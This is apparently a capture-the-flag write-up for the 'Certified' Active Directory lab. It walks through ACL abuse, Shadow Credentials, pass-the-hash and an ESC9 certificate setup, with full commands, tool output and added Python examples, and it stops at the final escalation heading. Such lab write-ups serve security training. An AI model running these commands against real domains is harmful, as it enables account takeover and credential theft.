Certified is a Windows machine running Active Directory with a misconfigured ACL, where credentials for a low-privileged user, judith.mader, are provided as the starting point. Reaching the management_svc, ca_operator and Administrator accounts requires abusing Active Directory Certificate Services (ADCS): Shadow Credentials for the first two hops and ESC9 for the last one.
Enumeration
Running nmap
# Nmap 7.94SVN scan initiated Tue Mar 18 13:17:25 2025 as: /usr/lib/nmap/nmap --privileged -n -Pn -v -sC -sV -oN nmap.txt 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.27s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-18 14:47:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2025-03-18T14:49:11+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2025-03-18T14:49:12+00:00; +6h59m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-18T14:49:11+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-18T14:49:12+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s
| smb2-time:
| date: 2025-03-18T14:48:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 18 13:19:14 2025 -- 1 IP address (1 host up) scanned in 108.32 seconds
Noting the following details:
- Domain: certified.htb
- DNS:DC01.certified.htb
- Issuer: commonName=certified-DC01-CA
Adding to /etc/hosts
10.10.11.41 DC01.certified.htb certified.htb
Credential check
kali@kali:~$ netexec smb certified.htb -u judith.mader -p judith09
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
kali@kali:~$ netexec ldap certified.htb -u judith.mader -p judith09
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
kali@kali:~$ netexec wmi certified.htb -u judith.mader -p judith09
RPC 10.10.11.41 135 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
RPC 10.10.11.41 135 DC01 [+] certified.htb\judith.mader:judith09
We see that the provided credentials work with SMB, LDAP, WMI.
Shares accessible
kali@kali:~$ netexec smb dc01.certified.htb -u judith.mader -p judith09 --shares
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [*] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share
All we find are the standard shares of a Windows domain controller; only IPC$, NETLOGON and SYSVOL are readable.
Checking for availability of ADCS CAs using netexec
kali@kali:~$ netexec smb certified.htb -u judith.mader -p judith09 -M enum_ca
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
ENUM_CA 10.10.11.41 445 DC01 Active Directory Certificate Services Found.
ENUM_CA 10.10.11.41 445 DC01 http://10.10.11.41/certsrv/certfnsh.asp
ADCS is present on DC01, and the module also reports the web enrollment endpoint http://10.10.11.41/certsrv/certfnsh.asp.
Using certipy
kali@kali:~$ certipy find -u judith.mader -p judith09 -dc-ip 10.10.11.41 -stdout -enabled
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
<----SNIP---->
From the (snipped) enumeration output:
- Every enabled template except CertifiedAuthentication is one of the default certificate templates [1] on Windows servers.
- CertifiedAuthentication grants Enrollment Rights to CERTIFIED.HTB\operator ca, which is the ca_operator account shown by its CN.
- Its Enrollment Flag includes NoSecurityExtension, so certificates issued from this template will not carry the szOID_NTDS_CA_SECURITY_EXT extension that embeds the requester's SID.
- This is interesting: we now know that CERTIFIED.HTB\operator ca has enrollment rights on a template with the NoSecurityExtension flag set, and all roads lead towards an ESC9 attack on AD CS.
Bloodhound scan
We'll be using BloodHound Community Edition [2].
Collecting data
- Install bloodhound-ce-python, the collector for BloodHound CE
kali@kali:~$ sudo apt install bloodhound-ce-python
- Run Bloodhound collector using credentials and export as zip.
kali@kali:~$ bloodhound-ce-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 48S
INFO: Compressing output into 20250318133102_bloodhound.zip
Setting up
Install BloodHound Community Edition with Docker Compose [3]
kali@kali:~$ mkdir -p /home/kali/tools/BloodHound/
kali@kali:~$ curl -L https://ghst.ly/getbhce > docker-compose.yml
kali@kali:~$ docker compose up
Ingest data into BloodHound
- Open http://localhost:8080/ui/administration/file-ingest and upload 20250318133102_bloodhound.zip, then explore the graph at http://localhost:8080/ui/explore
Exploring Attack Path
Search for judith.mader and mark it as owned, then select Pathfinding:
- Set JUDITH.MADER@CERTIFIED.HTB as the Starting Node
- Set CA_OPERATOR@CERTIFIED.HTB as the Ending Node
We see the path
JUDITH.MADER@CERTIFIED.HTB -> WriteOwner -> MANAGEMENT@CERTIFIED.HTB -> GenericWrite -> MANAGEMENT_SVC@CERTIFIED.HTB -> GenericAll -> CA_OPERATOR@CERTIFIED.HTB
Click on each edge between the nodes to view the relationship information and the steps BloodHound suggests for abusing the permission.
| Permission | Description |
|---|---|
| WriteOwner | The right to assume ownership of the object. The user must be an object trustee and cannot transfer the ownership to other users. |
| GenericWrite | The right to read permissions on this object, write all the properties on this object, and perform all validated writes to this object. |
| GenericAll | The right to create or delete children, delete a subtree, read and write properties, examine children and the object itself, add and remove the object from the directory, and read or write with an extended right. |
Read more about these Active Directory rights (WriteOwner, GenericWrite, GenericAll) in Microsoft's ActiveDirectoryRights documentation, from which the descriptions above are taken.
Foothold
Abuse WriteOwner to add judith.mader to the Management group, then abuse the group's GenericWrite over management_svc to take over that account.
The steps follow the Linux Abuse section BloodHound shows for each edge.
Abuse WriteOwner to add judith.mader to the Management group.
- Change the ownership of the object
kali@kali:~$ impacket-owneredit \
-action write \
-new-owner judith.mader \
-target management \
certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-1103
[*] - sAMAccountName: judith.mader
[*] - distinguishedName: CN=Judith Mader,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
- Add judith.mader to the Management group
kali@kali:~$ net rpc group addmem management judith.mader \
-U certified.htb/judith.mader%judith09 \
-S 10.10.11.41
Could not add judith.mader to management: NT_STATUS_ACCESS_DENIED
We cannot add judith.mader yet: taking ownership by itself grants no write access to the group's member attribute, so the request fails with NT_STATUS_ACCESS_DENIED until the new owner grants itself that right.
- Grant judith.mader the AddMember (WriteMembers) permission. As the owner, judith.mader holds implicit WRITE_DAC and can edit the group's DACL:
kali@kali:~$ impacket-dacledit \
-action write \
-rights WriteMembers \
-principal judith.mader \
-target management \
certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250318-161851.bak
[*] DACL modified successfully!
- Now add judith.mader to the Management group
kali@kali:~$ net rpc group addmem management judith.mader \
-U certified.htb/judith.mader%judith09 -S 10.10.11.41
# no output here
- Check that we were added to the Management group
kali@kali:~$ net rpc group members Management \
-U certified.htb/judith.mader%judith09 -S 10.10.11.41
CERTIFIED\judith.mader
CERTIFIED\management_svc
Abuse the GenericWrite and get access to the management_svc account.
Failed attempt: Targeted Kerberoast
- GenericWrite over management_svc lets us set a servicePrincipalName on it, so the first idea is a targeted Kerberoast:
kali@kali:~$ /home/kali/tools/targetedKerberoast/targetedKerberoast.py -v -d certified.htb -u judith.mader -p judith09
- We get KRB_AP_ERR_SKEW (Clock skew too great), the ~7 h offset nmap reported; Kerberos tolerates 5 minutes by default, so sync the clock with the DC
rdate -n 10.10.11.41
- Rerun
kali@kali:~$ /home/kali/tools/targetedKerberoast/targetedKerberoast.py -v -d certified.htb -u judith.mader -p judith09
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (management_svc)
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$55349f9dc3ceab490b9a19b4979ca2b7$<----SNIP---->
- Put the hash in certified.kb.hash and run hashcat on the host machine for faster cracking.
aditya@mint:~/tmp/cracking$ hashcat certified.kb.hash SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
<----SNIP---->
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
<----SNIP---->
- Status Exhausted: the password is not in rockyou.txt, so the hash cannot be cracked this way.
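As an added example (not part of the original writeup), the check below parses the $krb5tgs$ line that targetedKerberoast prints, pulls out the account, realm, SPN and encryption type, and maps the etype to the hashcat mode it needs, so a mixed batch of RC4 and AES tickets is split before any GPU time is spent. The sample hashes are constructed: the first reuses the header of the management_svc hash above with filler in place of the real encrypted data, and the second is an invented AES256 ticket.

```python
import re

# Added example (not from the original writeup): triage Kerberoast hashes.
# The etype in the $krb5tgs$ header decides the hashcat mode; an AES ticket
# fed to -m 13100 simply fails to load.
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}

# etype 23 (RC4-HMAC): $krb5tgs$23$*user$REALM$spn*$checksum(16 bytes)$edata
RC4_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)
# etype 17/18 (AES): $krb5tgs$18$user$REALM$*spn*$checksum(12 bytes)$edata
AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{24})\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_krb5tgs(line):
    """Parse one $krb5tgs$ line into its fields plus the matching hashcat mode."""
    line = line.strip()
    m = RC4_RE.match(line) or AES_RE.match(line)
    if m is None:
        raise ValueError("not a recognised $krb5tgs$ line")
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    fields["hashcat_mode"] = HASHCAT_MODES[fields["etype"]]
    fields["edata_bytes"] = len(fields["edata"]) // 2
    return fields


def is_krb5tgs(line):
    """True when the line is a well-formed TGS-REP hash in one of the supported layouts."""
    try:
        parse_krb5tgs(line)
        return True
    except ValueError:
        return False


def triage(lines):
    """Group SPNs by the hashcat mode they need, skipping malformed lines."""
    groups = {}
    for line in lines:
        if not is_krb5tgs(line):
            continue
        h = parse_krb5tgs(line)
        groups.setdefault(h["hashcat_mode"], []).append(h["spn"])
    return groups


# Constructed samples: the first keeps the header and checksum of the
# management_svc hash from this writeup but uses filler for the encrypted
# data; the second is an invented AES256 ticket for a made-up SQL service.
SAMPLE_RC4 = ("$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*"
              "$55349f9dc3ceab490b9a19b4979ca2b7$" + "ab" * 64)
SAMPLE_AES = ("$krb5tgs$18$svc_sql$CORP.LOCAL$*MSSQLSvc/db01.corp.local:1433*"
              "$" + "cd" * 12 + "$" + "ef" * 64)

if __name__ == "__main__":
    for mode, spns in triage([SAMPLE_RC4, SAMPLE_AES, "not a hash"]).items():
        print("hashcat -m %d <file> <wordlist>   # %s" % (mode, ", ".join(spns)))
```

For the hash above the header says etype 23, which is why hashcat's autodetect landed on mode 13100; with AES tickets (etype 17/18) you need -m 19600 or -m 19700 and, being far slower per guess, they are usually not worth a large wordlist run.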
- Shadow Credentials attack
(The lab periodically cleans up the ACL changes, so redo the addition of judith.mader to the Management group if it has been reverted.)
$ impacket-owneredit -action write -new-owner judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41
$ impacket-dacledit -action write -rights WriteMembers -principal judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41
$ net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41
- Running pywhisker
kali@kali:~$ pywhisker \
-d certified.htb \
-u judith.mader \
-p judith09 \
--target management_svc \
--action add
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: ddd98447-0b45-2036-d590-f9a4db26c7cc
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: GyabvRCI.pfx
[+] PFX exported to: GyabvRCI.pfx
[i] Password for PFX: CZtkCaDtEI7T7rZKwnRs
[+] Saved PFX (#PKCS12) certificate & key at path: GyabvRCI.pfx
[*] Must be used with password: CZtkCaDtEI7T7rZKwnRs
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
- Get a TGT using PKINITtools (resync the clock first if the skew has returned)
rdate -n 10.10.11.41
kali@kali:~$ python /home/kali/tools/PKINITtools/gettgtpkinit.py \
-cert-pfx GyabvRCI.pfx \
-pfx-pass CZtkCaDtEI7T7rZKwnRs \
-dc-ip 10.10.11.41 \
certified.htb/management_svc management_svc.out.ccache
2025-03-18 23:49:42,687 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-03-18 23:49:42,721 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-03-18 23:49:57,375 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-03-18 23:49:57,375 minikerberos INFO 0c3977778b498c8db265b41988a98a7c9e863f1dce22ecb69ac1f2cf752a4790
INFO:minikerberos:0c3977778b498c8db265b41988a98a7c9e863f1dce22ecb69ac1f2cf752a4790
2025-03-18 23:49:57,377 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
TGT saved in management_svc.out.ccache
- Get the NT hash using PKINITtools (UnPAC-the-hash: the AS-REP key from the previous step decrypts the PAC in a ticket requested to ourselves)
kali@kali:~$ export KRB5CCNAME=management_svc.out.ccache
kali@kali:~$ python /home/kali/tools/PKINITtools/getnthash.py \
-key 0c3977778b498c8db265b41988a98a7c9e863f1dce22ecb69ac1f2cf752a4790 \
-dc-ip 10.10.11.41 \
certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT hash: a091██████cdd4677c28b5a6a1295584
- Pass the Hash and check if we can access via SMB
kali@kali:~$ netexec smb certified.htb \
-u management_svc \
-H a091██████cdd4677c28b5a6a1295584
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\management_svc:a091██████cdd4677c28b5a6a1295584
We can now get a shell as management_svc with the recovered NT hash using evil-winrm (pass-the-hash over WinRM)
kali@kali:~$ evil-winrm -u management_svc -H a091██████cdd4677c28b5a6a1295584 -i 10.10.11.41
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents>
Getting user.txt
*Evil-WinRM* PS C:\Users\management_svc\Desktop> type user.txt
87██████34b1df44bafef6f7c70a8697
We may also use certipy to perform the Shadow Credentials attack in one step: it adds the KeyCredential, authenticates via PKINIT, recovers the NT hash and restores the original msDS-KeyCredentialLink.
kali@kali:~$ certipy shadow auto \
-username judith.mader@certified.htb \
-password judith09 \
-account management_svc \
-target certified.htb \
-dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b2ef91f2-161f-082e-e6ea-24c5969e4b2d'
[*] Adding Key Credential with device ID 'b2ef91f2-161f-082e-e6ea-24c5969e4b2d' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'b2ef91f2-161f-082e-e6ea-24c5969e4b2d' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091██████cdd4677c28b5a6a1295584
Recovered NT hash: a091██████cdd4677c28b5a6a1295584
Lateral Movement
- Getting access to ca_operator via management_svc.
- This works because management_svc has GenericAll over ca_operator, which includes the write to msDS-KeyCredentialLink that Shadow Credentials needs; it is the same technique as in the previous step.
kali@kali:~$ certipy shadow auto \
-username management_svc@certified.htb \
-hashes :a091██████cdd4677c28b5a6a1295584 \
-account ca_operator \
-target certified.htb \
-dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'de811fc7-e311-54bf-67de-3148caea5c1b'
[*] Adding Key Credential with device ID 'de811fc7-e311-54bf-67de-3148caea5c1b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID 'de811fc7-e311-54bf-67de-3148caea5c1b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664██████f45d8f2
Pass the Hash and check if we can access via SMB
kali@kali:~$ netexec smb certified.htb \
-u ca_operator \
-H b4b86f45c6018f1b664██████f45d8f2
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\ca_operator:b4b86f45c6018f1b664██████f45d8f2
We now have ca_operator, which holds Enrollment Rights on the CertifiedAuthentication template.
Privilege Escalation
ESC9 on template CertifiedAuthentication via ca_operator on CA certified-DC01-CA
The following conditions for an ESC9 attack [4][5] are met:
- MANAGEMENT_SVC@CERTIFIED.HTB has GenericAll (which includes GenericWrite) over CA_OPERATOR@CERTIFIED.HTB, so it can rewrite ca_operator's userPrincipalName.
- CA_OPERATOR@CERTIFIED.HTB is allowed to enroll in the vulnerable template CertifiedAuthentication.
- CertifiedAuthentication has the NoSecurityExtension enrollment flag set, so certificates issued from it carry no szOID_NTDS_CA_SECURITY_EXT (object SID) extension and the DC has to map them by the UPN in the SAN instead of by SID.
ESC9 also relies on the DC not running in full enforcement mode (StrongCertificateBindingEnforcement = 2 rejects certificates without the SID extension); the certificate authentication at the end of this section succeeding shows the weaker UPN mapping is still accepted here.
Running certipy find again confirms the enrollment rights and the flag (the output was a screenshot in the original).
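To make the mechanism behind these conditions concrete, here is an added example, written for this page rather than taken from the writeup or from certipy, that builds in stdlib-only Python the two extensions a Windows CA places in a user certificate, the SAN otherName carrying the UPN and the szOID_NTDS_CA_SECURITY_EXT extension carrying the requester's SID, and then models the DC's mapping decision for a NoSecurityExtension certificate versus a normal one after the UPN swap. The extension layouts follow the structures AD CS uses; the SIDs, the account table and the mapping rules are constructed simplifications of the KB5014754 behaviour (issuance-time checks and certificate mapping methods are left out).

```python
# Added example, not code from the original writeup or from certipy: why a
# NoSecurityExtension template enables ESC9, modelled offline with a tiny
# stdlib-only DER encoder/decoder. A user certificate normally carries the
# requester's object SID in szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2);
# without it the DC maps the certificate by the UPN in the SAN, which
# GenericWrite over the requesting account lets an attacker change.
SAN_OID = "2.5.29.17"
UPN_OID = "1.3.6.1.4.1.311.20.2.3"             # szOID_NT_PRINCIPAL_NAME
SID_EXT_OID = "1.3.6.1.4.1.311.25.2"           # szOID_NTDS_CA_SECURITY_EXT
SID_OTHERNAME_OID = "1.3.6.1.4.1.311.25.2.1"   # szOID_NTDS_OBJECTSID


def der(tag, body):
    """One TLV; long-form length when the content exceeds 127 bytes."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    size = (n.bit_length() + 7) // 8
    return bytes([tag, 0x80 | size]) + n.to_bytes(size, "big") + body


def oid_body(dotted):
    """Content octets of an OBJECT IDENTIFIER (first two arcs packed, then base-128)."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(chunk)
    return bytes(out)


def der_items(blob):
    """Split a DER blob into its top-level (tag, content) pairs."""
    items, pos = [], 0
    while pos < len(blob):
        tag, ln, pos = blob[pos], blob[pos + 1], pos + 2
        if ln & 0x80:
            n = ln & 0x7F
            ln, pos = int.from_bytes(blob[pos:pos + n], "big"), pos + n
        items.append((tag, blob[pos:pos + ln]))
        pos += ln
    return items


def ext_san_upn(upn):
    """SAN extension with one otherName { szOID_NT_PRINCIPAL_NAME, [0] UTF8String }."""
    other = der(0xA0, der(0x06, oid_body(UPN_OID)) + der(0xA0, der(0x0C, upn.encode())))
    return der(0x30, der(0x06, oid_body(SAN_OID)) + der(0x04, der(0x30, other)))


def ext_sid(sid):
    """Security extension: SEQUENCE { [0] { szOID_NTDS_OBJECTSID, [0] OCTET STRING sid } }."""
    other = der(0xA0, der(0x06, oid_body(SID_OTHERNAME_OID)) + der(0xA0, der(0x04, sid.encode())))
    return der(0x30, der(0x06, oid_body(SID_EXT_OID)) + der(0x04, der(0x30, other)))


def issue_extensions(upn, sid=None):
    """What the CA emits: a normal template embeds the requester's SID, NoSecurityExtension omits it."""
    return der(0x30, ext_san_upn(upn) + (ext_sid(sid) if sid else b""))


def _other_name(general_names, type_oid):
    """Value of the otherName [0] whose type-id equals type_oid, or None."""
    for tag, body in der_items(general_names):
        if tag == 0xA0:
            type_id, value = der_items(body)[:2]
            if type_id[1] == oid_body(type_oid):
                return der_items(value[1])[0][1]        # unwrap the [0] EXPLICIT wrapper
    return None


def cert_identity(extensions_der):
    """(upn, sid) as the DC reads them from the Extensions blob; either may be None."""
    upn = sid = None
    for _, ext in der_items(der_items(extensions_der)[0][1]):
        parts = der_items(ext)
        oid, value = parts[0][1], parts[-1][1]          # a critical BOOLEAN may sit in between
        names = der_items(value)[0][1]                  # content of the inner SEQUENCE
        if oid == oid_body(SAN_OID):
            raw = _other_name(names, UPN_OID)
            upn = raw.decode() if raw else None
        elif oid == oid_body(SID_EXT_OID):
            raw = _other_name(names, SID_OTHERNAME_OID)
            sid = raw.decode() if raw else None
    return upn, sid


def map_certificate(extensions_der, accounts, enforcement=1):
    """Simplified KB5014754 mapping. accounts: {sid: (sAMAccountName, UPN)};
    enforcement: StrongCertificateBindingEnforcement (0 off, 1 compatibility, 2 full)."""
    upn, sid = cert_identity(extensions_der)
    if upn is None:
        return ("rejected", "certificate has no UPN")
    match = None
    for acct_sid, (sam, acct_upn) in accounts.items():   # bare UPN falls back to sAMAccountName (simplification)
        if upn.lower() == acct_upn.lower() or ("@" not in upn and upn.lower() == sam.lower()):
            match = (acct_sid, sam)
    if match is None:
        return ("rejected", "no account matches UPN %r" % upn)
    if sid is not None:                                  # strong mapping: SID must name the UPN's account
        return ("strong", match[1]) if sid == match[0] else ("rejected", "SID does not match UPN account")
    if enforcement == 2:
        return ("rejected", "no SID extension under full enforcement")
    return ("weak", match[1])                            # compatibility mode: accepted, only audited


# Constructed directory snapshot; these SIDs are made up, not the lab's.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
CA_OPERATOR_SID = DOMAIN_SID + "-1110"
ACCOUNTS = {
    DOMAIN_SID + "-500": ("Administrator", "administrator@certified.htb"),
    CA_OPERATOR_SID: ("ca_operator", "ca_operator@certified.htb"),
}
```

Calling map_certificate(issue_extensions("Administrator"), ACCOUNTS, 1) reproduces the attack: no SID, so the DC accepts the UPN mapping and returns ("weak", "Administrator"); with enforcement 2 the same certificate is rejected. issue_extensions("Administrator", CA_OPERATOR_SID), the same UPN swap on a template without the NoSecurityExtension flag, is rejected because the embedded SID still names ca_operator.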
Retrieving Administrator's NT hash
